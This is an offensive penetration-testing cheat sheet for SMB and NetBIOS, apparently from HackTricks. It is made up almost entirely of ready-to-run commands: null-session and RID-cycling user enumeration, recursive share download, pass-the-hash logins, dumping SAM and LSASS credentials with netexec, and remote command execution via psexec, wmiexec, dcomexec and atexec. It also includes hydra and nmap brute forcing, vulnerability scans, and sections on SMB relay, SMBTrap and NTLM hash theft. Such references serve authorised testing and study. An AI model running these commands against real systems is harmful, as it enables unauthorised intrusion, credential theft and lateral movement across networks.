139,445 - SMB

NetBIOS Overview

NetBIOS (Network Basic Input/Output System) is a legacy API that allows applications on different computers to communicate over a local area network (LAN). It provides services related to the session layer of the OSI model, enabling applications to connect to each other over the network.
Port 139 is used by the NetBIOS Session Service, which provides session-layer functionality, such as:

File and Printer Sharing: Port 139 is often used by Windows systems to support file and printer sharing, especially over older versions of Windows networking.
Authentication and Login: It can facilitate the authentication and login processes in certain network configurations.
Establishing Sessions: Port 139 is used to establish sessions between two computers for communication, particularly for sharing resources.

Server Message Block Overview - Port 445

Port 445 is identified as ‘SMB over IP’. The acronym SMB stands for ‘Server Message Blocks’, which is also modernly known as the Common Internet File System (CIFS). As an application-layer network protocol, SMB/CIFS is primarily utilized to enable shared access to files, printers, serial ports, and facilitate various forms of communication between nodes on a network.

The Server Message Block (SMB) protocol, operating in a client-server model, is designed for regulating access to files, directories, and other network resources like printers and routers. Primarily utilized within the Windows operating system series, SMB ensures backward compatibility, allowing devices with newer versions of Microsoft's operating system to seamlessly interact with those running older versions. Additionally, the Samba project offers a free software solution, enabling SMB's implementation on Linux and Unix systems, thereby facilitating cross-platform communication through SMB.

$IPC shares

Access to the IPC$ share can be obtained through an anonymous null session, allowing for interaction with services exposed via named pipes.

NTLM and SMB?

SMB often uses NTLM for user authentication when accessing shared resources

Enumeration

Obtain Information

#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb  --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
impacket-samrdump -port 139 [[domain/]username[:password]@]<targetName or address>
impacket-samrdump -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
impacket-rpcdump -port 135 [[domain/]username[:password]@]<targetName or address>
impacket-rpcdump -port 139 [[domain/]username[:password]@]<targetName or address>
impacket-rpcdump -port 445 [[domain/]username[:password]@]<targetName or address>

Enumerate Users, Groups & Logged On Users

This info should already being gathered from enum4linux and enum4linux-ng

netexec smb 10.10.10.10 --users [-u <username> -p <password>]
netexec smb 10.10.10.10 --groups [-u <username> -p <password>]
netexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups

Enumerate local users

impacket-lookupsid -no-pass hostname.local

RPCclient - Oneliner

for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

RPCclient other commands

rpcclient Commands

Command	Interface	Description
`queryuser`	SAMR	Retrieve user information
`querygroup`	SAMR	Retrieve group information
`querydominfo`	SAMR	Retrieve domain information
`enumdomusers`	SAMR	Enumerate domain users
`enumdomgroups`	SAMR	Enumerate domain groups
`createdomuser`	SAMR	Create a domain user
`deletedomuser`	SAMR	Delete a domain user
`lookupnames`	LSARPC	Look up usernames to SID values
`lookupsids`	LSARPC	Look up SIDs to usernames (RID cycling)
`lsaaddacctrights`	LSARPC	Add rights to a user account
`lsaremoveacctrights`	LSARPC	Remove rights from a user account
`dsroledominfo`	LSARPC-DS	Get primary domain information
`dsenumdomtrusts`	LSARPC-DS	Enumerate trusted domains within an AD forest

Shared Folders Enumeration

List shared folders

smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash

smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "passw`ord" -H <IP> [-P <PORT>] #Recursive list

netexec smb <IP> -u '' -p '' --shares #Null user
netexec smb <IP> -u 'username' -p 'password' --shares #Guest user
netexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user

Connect/List a shared folder

#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls'  to list recursively with smbclient

#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash

Manually enumerate windows shares and connect to them

smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)


smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session

Enumerate shares from Windows / without third-party tools

PowerShell

# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection

CMD console

# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all

MMC Snap-in (graphical)

# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc

explorer.exe (graphical), enter \\<ip>\ to see the available non-hidden shares.

Mount a shared folder

mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share

Download files

Read previous sections to learn how to connect with credentials/Pass-the-Hash.

#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap

#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory

Commands:

mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files)
recurse: toggles recursion on (default: off)
prompt: toggles prompting for filenames off (default: on)
mget: copies all files matching the mask from host to client machine

(Information from the manpage of smbclient)

Domain Shared Folders Search

Snaffler****

Snaffler.exe -s -d domain.local -o snaffler.log -v data

sudo netexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'

Impacket-RegLRead Registry

You may be able to read the registry using some discovered credentials. Impacket **reg.py** allows you to try:

sudo impacket-reg domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo impacket-reg domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo impacket-reg domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s

Post Exploitation

/etc/samba/smb.conf


Setting	Description
`browseable = yes`	Allow listing available shares in the current share?
`read only = no`	Forbid the creation and modification of files?
`writable = yes`	Allow users to create and modify files?
`guest ok = yes`	Allow connecting to the service without using a password?
`enable privileges = yes`	Honor privileges assigned to specific SID?
`create mask = 0777`	What permissions must be assigned to the newly created files?
`directory mask = 0777`	What permissions must be assigned to the newly created directories?
`logon script = script.sh`	What script needs to be executed on the user's login?
`magic script = script.sh`	Which script should be executed when the script gets closed?
`magic output = script.out`	Where the output of the magic script needs to be stored?

The command smbstatus gives information about the server and about who is connected.

Authenticate using Kerberos

You can authenticate to kerberos using the tools smbclient and rpcclient:

smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com

Execute Commands

netexec

apt-get install crackmapexec

#Execute Powershell
netexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' 

#Excute cmd
netexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami 

# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
netexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash

#Dump SAM
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam 

#Dump LSASS in memmory hashes
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa 

#Get sessions (
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions 

#Get logged-on users
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users 

#Enumerate the disks
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks 

#Enumerate users
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users 

# Enumerate groups
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups 

# Enumerate local groups
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups 

#Get password policy
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol 

#RID brute
netexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute 

#Pass-The-Hash
netexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH>

psexec/smbexec

Both options will create a new service (using \pipe\svcctl via SMB) in the victim machine and use it to execute something (psexec will upload an executable file to ADMIN$ share and smbexec will point to cmd.exe/powershell.exe and put in the arguments the payload --file-less technique--). More info about psexec and smbexec.

#If no password is provided, it will be prompted
impacket-psexec [[domain/]username[:password]@]<targetName or address>

#Pass-the-Hash
impacket-psexec -hashes <LM:NT> administrator@10.10.10.103 
impacket-psexec \\192.168.122.66 -u Administrator -p 123456Ww
 
# Use pass the hash
impacket-psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t

Using parameter-k you can authenticate against kerberos instead of NTLM

wmiexec/dcomexec

Stealthily execute a command shell without touching the disk or running a new service using DCOM via port 135. In kali it is located on /usr/share/doc/python3-impacket/examples/

#If no password is provided, it will be prompted
#Prompt for password
impacket-wmiexec [[domain/]username[:password]@]<targetName or address> 

#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
#Pass-the-Hash
impacket-wmiexec -hashes LM:NT administrator@10.10.10.103

Using parameter-k you can authenticate against kerberos instead of NTLM

#If no password is provided, it will be prompted
impacket-dcomexec [[domain/]username[:password]@]<targetName or address>

#Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
impacket-dcomexec -hashes <LM:NT> administrator@10.10.10.103

AtExec

Execute commands via the Task Scheduler (using \pipe\atsvc via SMB). In kali it is located on /usr/share/doc/python3-impacket/examples/

impacket-atexec [[domain/]username[:password]@]<targetName or address> "command"
impacket-atexec -hashes <LM:NT> administrator@10.10.10.175 "whoami"

Bruteforce users credentials

This is not recommended, you could block an account if you exceed the maximum allowed tries

nmap --script smb-brute -p 445 <IP>

#Get usernames bruteforcing that rids and then try to bruteforce each user name
impacket-ridenum <IP> 500 50000 /root/passwds.txt

SMB relay attack

This attack uses the Responder toolkit to capture SMB authentication sessions on an internal network, and relays them to a target machine. If the authentication session is successful, it will automatically drop you into a system shell. More information about this attack here.

SMB-Trap

The Windows library URLMon.dll automatically try to authenticaticate to the host when a page tries to access some contect via SMB, for example: img src="\\10.10.10.10\path\image.jpg"

This happens with the functions:

URLDownloadToFile
URLDownloadToCache
URLOpenStream
URLOpenBlockingStream

Which are used by some browsers and tools (like Skype)

From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html

SMBTrap using MitMf

From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html

NTLM Theft

Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an SMB relay attack.

See: ntlm_theft

HackTricks Automatic Commands

Protocol_Name: SMB    #Protocol Abbreviation if there is one.
Port_Number:  137,138,139     #Comma separated if there is more than one.
Protocol_Description: Server Message Block         #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for SMB
  Note: |
    While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.

    #These are the commands I run in order every time I see an open SMB port

    With No Creds
    nbtscan {IP}
    smbmap -H {IP}
    smbmap -H {IP} -u null -p null
    smbmap -H {IP} -u guest
    smbclient -N -L //{IP}
    smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
    rpcclient {IP}
    rpcclient -U "" {IP}
    netexec smb {IP}
    netexec smb {IP} --pass-pol -u "" -p ""
    netexec smb {IP} --pass-pol -u "guest" -p ""
    impacket-GetADUsers -dc-ip {IP} "{Domain_Name}/" -all
    impacket-GetNPUsers -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
    impacket-GetUserSPNs -dc-ip {IP} -request "{Domain_Name}/"
    impacket-getArch -target {IP}

    With Creds
    smbmap -H {IP} -u {Username} -p {Password}
    smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
    smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
    netexec smb {IP} -u {Username} -p {Password} --shares
    impacket-GetADUsers {Domain_Name}/{Username}:{Password} -all
    impacket-GetNPUsers {Domain_Name}/{Username}:{Password} -request -format hashcat
    impacket-GetUserSPNs {Domain_Name}/{Username}:{Password} -request

    https://book.hacktricks.xyz/pentesting/pentesting-smb

Entry_2:
  Name: Enum4Linux
  Description: General SMB Scan
  Command: enum4linux -a {IP}

Entry_3:
  Name: Nmap SMB Scan 1
  Description: SMB Vuln Scan With Nmap
  Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}

Entry_4:
  Name: Nmap Smb Scan 2
  Description: SMB Vuln Scan With Nmap (Less Specific)
  Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}

Entry_5:
  Name: Hydra Brute Force
  Description: Need User
  Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
  
Entry_6:
  Name: SMB/SMB2 139/445 consolesless mfs enumeration
  Description: SMB/SMB2 139/445  enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'